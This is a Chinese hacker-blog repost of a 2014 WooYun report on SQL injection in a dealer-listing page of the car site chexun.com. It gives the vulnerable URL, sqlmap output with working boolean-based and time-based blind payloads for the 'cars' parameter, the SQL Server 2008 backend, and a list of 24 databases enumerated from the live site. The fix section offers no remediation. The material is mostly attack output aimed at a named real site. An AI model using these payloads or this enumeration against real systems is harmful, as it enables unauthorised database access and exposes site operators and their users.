记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

车讯网某分站SQL注入

2014-07-28 09:30

无。

漏洞证明:

http://dealer.chexun.com/DealerList.aspx?cars=238&brandId=56















sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: cars

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: cars=238) AND 9857=9857 AND (5563=5563&brandId=56



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)

Payload: cars=-7468) OR 3335=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers

AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sys

users AS sys7) AND (5286=5286&brandId=56

---

[23:35:38] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows

web application technology: ASP.NET

back-end DBMS: Microsoft SQL Server 2008















available databases [24]:

[*] CheBaiKe

[*] DBAiKaZhuaQu

[*] DBCarSite

[*] DBCharacterLibrary

[*] DBComment

[*] DBDealersShop

[*] DBDingYue

[*] DBDoublue11

[*] DBFeedback

[*] DBSMS

[*] DBTuangou

[*] DBUCenter

[*] DBVoting

[*] DBWapNews

[*] distribution

[*] master

[*] model

[*] msdb

[*] ProjectManagement

[*] ReportServer

[*] ReportServerTempDB

[*] tempdb

[*] test

[*] ZhaoCheGameDB

修复方案:

你们懂

知识来源: www.wooyun.org/bugs/wooyun-2014-064721

阅读:70852 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“车讯网某分站SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云